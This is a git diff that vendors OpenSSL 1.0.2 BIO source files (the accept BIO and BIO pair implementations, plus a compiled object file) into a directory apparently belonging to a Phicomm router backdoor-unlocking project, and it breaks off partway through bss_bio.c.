+        /* use this one to start the connection */
+        ret = (long)acpt_state(b, data);
+        break;
+    case BIO_C_SET_ACCEPT:
+        if (ptr != NULL) {
+            if (num == 0) {
+                b->init = 1;
+                if (data->param_addr != NULL)
+                    OPENSSL_free(data->param_addr);
+                data->param_addr = BUF_strdup(ptr);
+            } else if (num == 1) {
+                data->accept_nbio = (ptr != NULL);
+            } else if (num == 2) {
+                if (data->bio_chain != NULL)
+                    BIO_free(data->bio_chain);
+                data->bio_chain = (BIO *)ptr;
+            }
+        }
+        break;
+    case BIO_C_SET_NBIO:
+        data->nbio = (int)num;
+        break;
+    case BIO_C_SET_FD:
+        b->init = 1;
+        b->num = *((int *)ptr);
+        data->accept_sock = b->num;
+        data->state = ACPT_S_GET_ACCEPT_SOCKET;
+        b->shutdown = (int)num;
+        b->init = 1;
+        break;
+    case BIO_C_GET_FD:
+        if (b->init) {
+            ip = (int *)ptr;
+            if (ip != NULL)
+                *ip = data->accept_sock;
+            ret = data->accept_sock;
+        } else
+            ret = -1;
+        break;
+    case BIO_C_GET_ACCEPT:
+        if (b->init) {
+            if (ptr != NULL) {
+                pp = (char **)ptr;
+                *pp = data->param_addr;
+            } else
+                ret = -1;
+        } else
+            ret = -1;
+        break;
+    case BIO_CTRL_GET_CLOSE:
+        ret = b->shutdown;
+        break;
+    case BIO_CTRL_SET_CLOSE:
+        b->shutdown = (int)num;
+        break;
+    case BIO_CTRL_PENDING:
+    case BIO_CTRL_WPENDING:
+        ret = 0;
+        break;
+    case BIO_CTRL_FLUSH:
+        break;
+    case BIO_C_SET_BIND_MODE:
+        data->bind_mode = (int)num;
+        break;
+    case BIO_C_GET_BIND_MODE:
+        ret = (long)data->bind_mode;
+        break;
+    case BIO_CTRL_DUP:
+/*-     dbio=(BIO *)ptr;
+        if (data->param_port) EAY EAY
+                BIO_set_port(dbio,data->param_port);
+        if (data->param_hostname)
+                BIO_set_hostname(dbio,data->param_hostname);
+        BIO_set_nbio(dbio,data->nbio); */
+        break;
+
+    default:
+        ret = 0;
+        break;
+    }
+    return (ret);
+}
+
+static int acpt_puts(BIO *bp, const char *str)
+{
+    int n, ret;
+
+    n = strlen(str);
+    ret = acpt_write(bp, str, n);
+    return (ret);
+}
+
+BIO *BIO_new_accept(const char *str)
+{
+    BIO *ret;
+
+    ret = BIO_new(BIO_s_accept());
+    if (ret == NULL)
+        return (NULL);
+    if (BIO_set_accept_port(ret, str))
+        return (ret);
+    else {
+        BIO_free(ret);
+        return (NULL);
+    }
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_acpt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_acpt.o
new file mode 100644
index 0000000000000000000000000000000000000000..8ed66e37261a1915d7e0a7fab5fc7ca7a14afb02
GIT binary patch
literal 6376
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
Q?oG^{i1(sVTe(*M1se0_!T<mO

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_bio.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_bio.c
new file mode 100644
index 0000000..d629a37
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_bio.c
@@ -0,0 +1,886 @@
+/* crypto/bio/bss_bio.c  -*- Mode: C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 1998-2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * Special method for a BIO where the other endpoint is also a BIO of this
+ * kind, handled by the same thread (i.e. the "peer" is actually ourselves,
+ * wearing a different hat). Such "BIO pairs" are mainly for using the SSL
+ * library with I/O interfaces for which no specific BIO method is available.
+ * See ssl/ssltest.c for some hints on how this can be used.
+ */
+
+/* BIO_DEBUG implies BIO_PAIR_DEBUG */
+#ifdef BIO_DEBUG
+# ifndef BIO_PAIR_DEBUG
+#  define BIO_PAIR_DEBUG
+# endif
+#endif
+
+/* disable assert() unless BIO_PAIR_DEBUG has been defined */
+#ifndef BIO_PAIR_DEBUG
+# ifndef NDEBUG
+#  define NDEBUG
+# endif
+#endif
+
+#include <assert.h>
+#include <limits.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include <openssl/bio.h>
+#include <openssl/err.h>
+#include <openssl/crypto.h>
+
+#include "e_os.h"
+
+/* VxWorks defines SSIZE_MAX with an empty value causing compile errors */
+#if defined(OPENSSL_SYS_VXWORKS)
+# undef SSIZE_MAX
+#endif
+#ifndef SSIZE_MAX
+# define SSIZE_MAX INT_MAX
+#endif
+
+static int bio_new(BIO *bio);
+static int bio_free(BIO *bio);
+static int bio_read(BIO *bio, char *buf, int size);
+static int bio_write(BIO *bio, const char *buf, int num);
+static long bio_ctrl(BIO *bio, int cmd, long num, void *ptr);
+static int bio_puts(BIO *bio, const char *str);
+
+static int bio_make_pair(BIO *bio1, BIO *bio2);
+static void bio_destroy_pair(BIO *bio);
+
+static BIO_METHOD methods_biop = {
+    BIO_TYPE_BIO,
+    "BIO pair",
+    bio_write,
+    bio_read,
+    bio_puts,
+    NULL /* no bio_gets */ ,
+    bio_ctrl,
+    bio_new,
+    bio_free,
+    NULL                        /* no bio_callback_ctrl */
+};
+
+BIO_METHOD *BIO_s_bio(void)
+{
+    return &methods_biop;
+}
+
+struct bio_bio_st {
+    BIO *peer;                  /* NULL if buf == NULL. If peer != NULL, then
+                                 * peer->ptr is also a bio_bio_st, and its
+                                 * "peer" member points back to us. peer !=
+                                 * NULL iff init != 0 in the BIO. */
+    /* This is for what we write (i.e. reading uses peer's struct): */
+    int closed;                 /* valid iff peer != NULL */
+    size_t len;                 /* valid iff buf != NULL; 0 if peer == NULL */
+    size_t offset;              /* valid iff buf != NULL; 0 if len == 0 */
+    size_t size;
+    char *buf;                  /* "size" elements (if != NULL) */
+    size_t request;             /* valid iff peer != NULL; 0 if len != 0,
+                                 * otherwise set by peer to number of bytes
+                                 * it (unsuccessfully) tried to read, never
+                                 * more than buffer space (size-len)
+                                 * warrants. */
+};
+
+static int bio_new(BIO *bio)
+{
+    struct bio_bio_st *b;
+
+    b = OPENSSL_malloc(sizeof *b);
+    if (b == NULL)
+        return 0;
+
+    b->peer = NULL;
+    /* enough for one TLS record (just a default) */
+    b->size = 17 * 1024;
+    b->buf = NULL;
+
+    bio->ptr = b;
+    return 1;
+}
+
+static int bio_free(BIO *bio)
+{
+    struct bio_bio_st *b;
+
+    if (bio == NULL)
+        return 0;
+    b = bio->ptr;
+
+    assert(b != NULL);
+
+    if (b->peer)
+        bio_destroy_pair(bio);
+
+    if (b->buf != NULL) {
+        OPENSSL_free(b->buf);
+    }
+
+    OPENSSL_free(b);
+
+    return 1;
+}
+
+static int bio_read(BIO *bio, char *buf, int size_)
+{
+    size_t size = size_;
+    size_t rest;
+    struct bio_bio_st *b, *peer_b;
+
+    BIO_clear_retry_flags(bio);
+
+    if (!bio->init)
+        return 0;
+
+    b = bio->ptr;
+    assert(b != NULL);
+    assert(b->peer != NULL);
+    peer_b = b->peer->ptr;
+    assert(peer_b != NULL);
+    assert(peer_b->buf != NULL);
+
+    peer_b->request = 0;        /* will be set in "retry_read" situation */
+
+    if (buf == NULL || size == 0)
+        return 0;
+
+    if (peer_b->len == 0) {
+        if (peer_b->closed)
+            return 0;           /* writer has closed, and no data is left */
+        else {
+            BIO_set_retry_read(bio); /* buffer is empty */
+            if (size <= peer_b->size)
+                peer_b->request = size;
+            else
+                /*
+                 * don't ask for more than the peer can deliver in one write
+                 */
+                peer_b->request = peer_b->size;
+            return -1;
+        }
+    }
+
+    /* we can read */
+    if (peer_b->len < size)
+        size = peer_b->len;
+
+    /* now read "size" bytes */
+
+    rest = size;
+
+    assert(rest > 0);
+    do {                        /* one or two iterations */
+        size_t chunk;
+
+        assert(rest <= peer_b->len);
+        if (peer_b->offset + rest <= peer_b->size)
+            chunk = rest;
+        else
+            /* wrap around ring buffer */
+            chunk = peer_b->size - peer_b->offset;
+        assert(peer_b->offset + chunk <= peer_b->size);
+
+        memcpy(buf, peer_b->buf + peer_b->offset, chunk);
+
+        peer_b->len -= chunk;
+        if (peer_b->len) {
+            peer_b->offset += chunk;
+            assert(peer_b->offset <= peer_b->size);
+            if (peer_b->offset == peer_b->size)
+                peer_b->offset = 0;
+            buf += chunk;
+        } else {
+            /* buffer now empty, no need to advance "buf" */
+            assert(chunk == rest);
+            peer_b->offset = 0;
+        }
+        rest -= chunk;
+    }
+    while (rest);
+
+    return size;
+}
+
+/*-
+ * non-copying interface: provide pointer to available data in buffer
+ *    bio_nread0:  return number of available bytes
+ *    bio_nread:   also advance index
+ * (example usage:  bio_nread0(), read from buffer, bio_nread()
+ *  or just         bio_nread(), read from buffer)
+ */
+/*
+ * WARNING: The non-copying interface is largely untested as of yet and may
+ * contain bugs.
+ */
+static ossl_ssize_t bio_nread0(BIO *bio, char **buf)
+{
+    struct bio_bio_st *b, *peer_b;
+    ossl_ssize_t num;
+
+    BIO_clear_retry_flags(bio);
+
+    if (!bio->init)
+        return 0;
+
+    b = bio->ptr;
+    assert(b != NULL);
+    assert(b->peer != NULL);
+    peer_b = b->peer->ptr;
+    assert(peer_b != NULL);
+    assert(peer_b->buf != NULL);
+
+    peer_b->request = 0;
+
+    if (peer_b->len == 0) {
+        char dummy;
+
+        /* avoid code duplication -- nothing available for reading */
+        return bio_read(bio, &dummy, 1); /* returns 0 or -1 */
+    }
+
+    num = peer_b->len;
+    if (peer_b->size < peer_b->offset + num)
+        /* no ring buffer wrap-around for non-copying interface */
+        num = peer_b->size - peer_b->offset;
+    assert(num > 0);
+
+    if (buf != NULL)
+        *buf = peer_b->buf + peer_b->offset;
+    return num;
+}
+
+static ossl_ssize_t bio_nread(BIO *bio, char **buf, size_t num_)
+{
+    struct bio_bio_st *b, *peer_b;
+    ossl_ssize_t num, available;
+
+    if (num_ > SSIZE_MAX)
+        num = SSIZE_MAX;
+    else
+        num = (ossl_ssize_t) num_;
+
+    available = bio_nread0(bio, buf);
+    if (num > available)
+        num = available;
+    if (num <= 0)
+        return num;
+
+    b = bio->ptr;
+    peer_b = b->peer->ptr;
+
+    peer_b->len -= num;
+    if (peer_b->len) {
+        peer_b->offset += num;
+        assert(peer_b->offset <= peer_b->size);
+        if (peer_b->offset == peer_b->size)
+            peer_b->offset = 0;
+    } else
+        peer_b->offset = 0;
+
+    return num;
+}
+
+static int bio_write(BIO *bio, const char *buf, int num_)
+{
+    size_t num = num_;
+    size_t rest;
+    struct bio_bio_st *b;
+
+    BIO_clear_retry_flags(bio);
+
+    if (!bio->init || buf == NULL || num == 0)
+        return 0;
+
+    b = bio->ptr;
+    assert(b != NULL);
+    assert(b->peer != NULL);
+    assert(b->buf != NULL);
+
+    b->request = 0;
+    if (b->closed) {
+        /* we already closed */
+        BIOerr(BIO_F_BIO_WRITE, BIO_R_BROKEN_PIPE);
+        return -1;
+    }
+
+    assert(b->len <= b->size);
+
+    if (b->len == b->size) {
+        BIO_set_retry_write(bio); /* buffer is full */
+        return -1;
+    }
+
+    /* we can write */
+    if (num > b->size - b->len)
+        num = b->size - b->len;
+
+    /* now write "num" bytes */
+
+    rest = num;
+
+    assert(rest > 0);
+    do {                        /* one or two iterations */
+        size_t write_offset;
+        size_t chunk;
+
+        assert(b->len + rest <= b->size);
+
+        write_offset = b->offset + b->len;
+        if (write_offset >= b->size)
+            write_offset -= b->size;
+        /* b->buf[write_offset] is the first byte we can write to. */
+
+        if (write_offset + rest <= b->size)
+            chunk = rest;
+        else
+            /* wrap around ring buffer */
+            chunk = b->size - write_offset;
+
+        memcpy(b->buf + write_offset, buf, chunk);
+
+        b->len += chunk;
+
+        assert(b->len <= b->size);
+
+        rest -= chunk;
+        buf += chunk;
+    }
+    while (rest);
+
+    return num;
+}
+
+/*-
+ * non-copying interface: provide pointer to region to write to
+ *   bio_nwrite0:  check how much space is available
+ *   bio_nwrite:   also increase length
+ * (example usage:  bio_nwrite0(), write to buffer, bio_nwrite()
+ *  or just         bio_nwrite(), write to buffer)
+ */
+static ossl_ssize_t bio_nwrite0(BIO *bio, char **buf)
+{
+    struct bio_bio_st *b;
+    size_t num;
+    size_t write_offset;
+
+    BIO_clear_retry_flags(bio);
+
+    if (!bio->init)
+        return 0;
+
+    b = bio->ptr;
+    assert(b != NULL);
+    assert(b->peer != NULL);
+    assert(b->buf != NULL);
+
+    b->request = 0;
+    if (b->closed) {
+        BIOerr(BIO_F_BIO_NWRITE0, BIO_R_BROKEN_PIPE);
+        return -1;
+    }
+
+    assert(b->len <= b->size);
+
+    if (b->len == b->size) {
+        BIO_set_retry_write(bio);
+        return -1;
+    }
+
+    num = b->size - b->len;
+    write_offset = b->offset + b->len;
+    if (write_offset >= b->size)
+        write_offset -= b->size;
+    if (write_offset + num > b->size)
+        /*
+         * no ring buffer wrap-around for non-copying interface (to fulfil
+         * the promise by BIO_ctrl_get_write_guarantee, BIO_nwrite may have
+         * to be called twice)
+         */
+        num = b->size - write_offset;
+
+    if (buf != NULL)
+        *buf = b->buf + write_offset;
+    assert(write_offset + num <= b->size);
+
+    return num;
+}
+
+static ossl_ssize_t bio_nwrite(BIO *bio, char **buf, size_t num_)
+{
+    struct bio_bio_st *b;
+    ossl_ssize_t num, space;
+
+    if (num_ > SSIZE_MAX)
+        num = SSIZE_MAX;
+    else
+        num = (ossl_ssize_t) num_;
+
+    space = bio_nwrite0(bio, buf);
+    if (num > space)
+        num = space;
+    if (num <= 0)
+        return num;
+    b = bio->ptr;
+    assert(b != NULL);
+    b->len += num;
+    assert(b->len <= b->size);
+
+    return num;
+}
+
+static long bio_ctrl(BIO *bio, int cmd, long num, void *ptr)
+{
+    long ret;
+    struct bio_bio_st *b = bio->ptr;
+
+    assert(b != NULL);
+
+    switch (cmd) {
+        /* specific CTRL codes */
+
+    case BIO_C_SET_WRITE_BUF_SIZE:
+        if (b->peer) {
+            BIOerr(BIO_F_BIO_CTRL, BIO_R_IN_USE);
+            ret = 0;
+        } else if (num == 0) {
+            BIOerr(BIO_F_BIO_CTRL, BIO_R_INVALID_ARGUMENT);
+            ret = 0;
+        } else {
+            size_t new_size = num;
+
+            if (b->size != new_size) {
+                if (b->buf) {
+                    OPENSSL_free(b->buf);
+                    b->buf = NULL;
+                }
+                b->size = new_size;
+            }
+            ret = 1;
+        }
+        break;
+
+    case BIO_C_GET_WRITE_BUF_SIZE:
+        ret = (long)b->size;
+        break;
+
+    case BIO_C_MAKE_BIO_PAIR:
+        {
+            BIO *other_bio = ptr;
+
+            if (bio_make_pair(bio, other_bio))
+                ret = 1;
+            else
+                ret = 0;
+        }
+        break;
+
+    case BIO_C_DESTROY_BIO_PAIR:
+        /*
+         * Affects both BIOs in the pair -- call just once! Or let
+         * BIO_free(bio1); BIO_free(bio2); do the job.
+         */
+        bio_destroy_pair(bio);
+        ret = 1;
+        break;
+
+    case BIO_C_GET_WRITE_GUARANTEE:
+        /*
+         * How many bytes can the caller feed to the next write without
+         * having to keep any?
+         */
+        if (b->peer == NULL || b->closed)
+            ret = 0;
+        else
+            ret = (long)b->size - b->len;
+        break;
+
+    case BIO_C_GET_READ_REQUEST:
+        /*
+         * If the peer unsuccessfully tried to read, how many bytes were
+         * requested? (As with BIO_CTRL_PENDING, that number can usually be
+         * treated as boolean.)
+         */
+        ret = (long)b->request;
+        break;
+
+    case BIO_C_RESET_READ_REQUEST:
+        /*
+         * Reset request.  (Can be useful after read attempts at the other
+         * side that are meant to be non-blocking, e.g. when probing SSL_read
+         * to see if any data is available.)
+         */
+        b->request = 0;
+        ret = 1;
+        break;
+
+    case BIO_C_SHUTDOWN_WR:
+        /* similar to shutdown(..., SHUT_WR) */
+        b->closed = 1;
+        ret = 1;
+        break;
+
+    case BIO_C_NREAD0:
+        /* prepare for non-copying read */
+        ret = (long)bio_nread0(bio, ptr);
+        break;
+
+    case BIO_C_NREAD:
+        /* non-copying read */
+        ret = (long)bio_nread(bio, ptr, (size_t)num);
+        break;
+
+    case BIO_C_NWRITE0:
+        /* prepare for non-copying write */
+        ret = (long)bio_nwrite0(bio, ptr);
+        break;
+
+    case BIO_C_NWRITE:
+        /* non-copying write */
+        ret = (long)bio_nwrite(bio, ptr, (size_t)num);
+        break;
+
+        /* standard CTRL codes follow */
+
+    case BIO_CTRL_RESET:
+        if (b->buf != NULL) {
+            b->len = 0;
+            b->offset = 0;
+        }
+        ret = 0;
+        break;
+
+    case BIO_CTRL_GET_CLOSE:
+        ret = bio->shutdown;
+        break;
+
+    case BIO_CTRL_SET_CLOSE:
+        bio->shutdown = (int)num;
+        ret = 1;
+        break;
+
+    case BIO_CTRL_PENDING:
+        if (b->peer != NULL) {
+            struct bio_bio_st *peer_b = b->peer->ptr;
+
+            ret = (long)peer_b->len;
+        } else
+            ret = 0;
+        break;
+
+    case BIO_CTRL_WPENDING:
+        if (b->buf != NULL)
+            ret = (long)b->len;
+        else
+            ret = 0;
+        break;
+
+    case BIO_CTRL_DUP:
+        /* See BIO_dup_chain for circumstances we have to expect. */
+        {
+            BIO *other_bio = ptr;
+            struct bio_bio_st *other_b;
+
+            assert(other_bio != NULL);
+            other_b = other_bio->ptr;
+            assert(other_b != NULL);
+
+            assert(other_b->buf == NULL); /* other_bio is always fresh */
+
+            other_b->size = b->size;
+        }
+
+        ret = 1;
+        break;
+
+    case BIO_CTRL_FLUSH:
+        ret = 1;
+        break;
+
+    case BIO_CTRL_EOF:
+        {
+            BIO *other_bio = ptr;
+
+            if (other_bio) {
+                struct bio_bio_st *other_b = other_bio->ptr;
+
+                assert(other_b != NULL);
+                ret = other_b->len == 0 && other_b->closed;
+            } else
+                ret = 1;
+        }
+        break;
+
+    default:
+        ret = 0;
+    }
+    return ret;
+}
+
+static int bio_puts(BIO *bio, const char *str)
+{
+    return bio_write(bio, str, strlen(str));
+}
+
+static int bio_make_pair(BIO *bio1, BIO *bio2)
+{
+    struct bio_bio_st *b1, *b2;
+
+    assert(bio1 != NULL);
+    assert(bio2 != NULL);
+
+    b1 = bio1->ptr;
+    b2 = bio2->ptr;
+
+    if (b1->peer != NULL || b2->peer != NULL) {
+        BIOerr(BIO_F_BIO_MAKE_PAIR, BIO_R_IN_USE);
+        return 0;
+    }
+
+    if (b1->buf == NULL) {
+        b1->buf = OPENSSL_malloc(b1->size);
+        if (b1->buf == NULL) {
+            BIOerr(BIO_F_BIO_MAKE_PAIR, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        b1->len = 0;
+        b1->offset = 0;
+    }
+
+    if (b2->buf == NULL) {
+        b2->buf = OPENSSL_malloc(b2->size);
+        if (b2->buf == NULL) {
+            BIOerr(BIO_F_BIO_MAKE_PAIR, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        b2->len = 0;
+        b2->offset = 0;
+    }
+
+    b1->peer = bio2;
+    b1->closed = 0;
+    b1->request = 0;
+    b2->peer = bio1;
+    b2->closed = 0;
+    b2->request = 0;
+
+    bio1->init = 1;
+    bio2->init = 1;
+
+    return 1;
+}
+
+static void bio_destroy_pair(BIO *bio)
+{
+    struct bio_bio_st *b = bio->ptr;
+
+    if (b != NULL) {
+        BIO *peer_bio = b->peer;
+
+        if (peer_bio != NULL) {
+            struct bio_bio_st *peer_b = peer_bio->ptr;
+
+            assert(peer_b != NULL);
+            assert(peer_b->peer == bio);
+
+            peer_b->peer = NULL;
+            peer_bio->init = 0;
+            assert(peer_b->buf != NULL);
+            peer_b->len = 0;
+            peer_b->offset = 0;
+
+            b->peer = NULL;
+            bio->init = 0;
+            assert(b->buf != NULL);
+            b->len = 0;
+            b->offset = 0;
+        }
+    }
+}
+
+/* Exported convenience functions */
+int BIO_new_bio_pair(BIO **bio1_p, size_t writebuf1,
+                     BIO **bio2_p, size_t writebuf2)
+{
+    BIO *bio1 = NULL, *bio2 = NULL;
+    long r;
+    int ret = 0;
+
+    bio1 = BIO_new(BIO_s_bio());
+    if (bio1 == NULL)
+        goto err;
+    bio2 = BIO_new(BIO_s_bio());
+    if (bio2 == NULL)
+        goto err;
+
+    if (writebuf1) {
+        r = BIO_set_write_buf_size(bio1, writebuf1);
+        if (!r)
+            goto err;
+    }
+    if (writebuf2) {
+        r = BIO_set_write_buf_size(bio2, writebuf2);
+        if (!r)
+            goto err;
+    }
+
+    r = BIO_make_bio_pair(bio1, bio2);
+    if (!r)
+        goto err;
+    ret = 1;
+
+ err:
+    if (ret == 0) {
+        if (bio1) {
+            BIO_free(bio1);
+            bio1 = NULL;
+        }
+        if (bio2) {
+            BIO_free(bio2);
+            bio2 = NULL;
+        }
+    }
+
+    *bio1_p = bio1;
+    *bio2_p = bio2;
+    return ret;
+}
+
+size_t BIO_ctrl_get_write_guarantee(BIO *bio)
+{
+    return BIO_ctrl(bio, BIO_C_GET_WRITE_GUARANTEE, 0, NULL);
+}
+
+size_t BIO_ctrl_get_read_request(BIO *bio)
+{
